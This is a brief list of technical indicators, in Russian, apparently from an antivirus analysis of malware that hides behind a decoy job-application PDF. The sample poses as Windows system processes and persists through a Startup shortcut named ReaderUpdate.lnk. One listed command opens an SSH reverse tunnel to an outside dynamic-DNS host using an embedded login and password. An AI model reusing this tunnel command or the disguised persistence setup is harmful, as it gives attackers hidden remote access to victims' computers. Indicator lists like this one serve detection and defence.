Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\ReaderUpdate.lnk
- 'C:\PefrLogs\explorer.exe' -ssh -R 48638:127.0.0.1:7908 iapula.zapto.org -l iapula -pw sugicoiudacacitesti
- 'C:\PefrLogs\winlogon.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p7908 -a
- 'C:\PefrLogs\taskhost.exe'
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL C:\PefrLogs\pro-job-application-form1-21.pdf
- C:\PefrLogs\explorer.exe
- C:\PefrLogs\pro-job-application-form1-21.pdf
- <LS_APPDATA>\PUTTY.RND
- C:\PefrLogs\winlogon.exe
- C:\PefrLogs\ReaderUpdate.lnk
- C:\PefrLogs\taskhost.exe
- 'ia####.zapto.org':22
- DNS ASK ia####.zapto.org
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'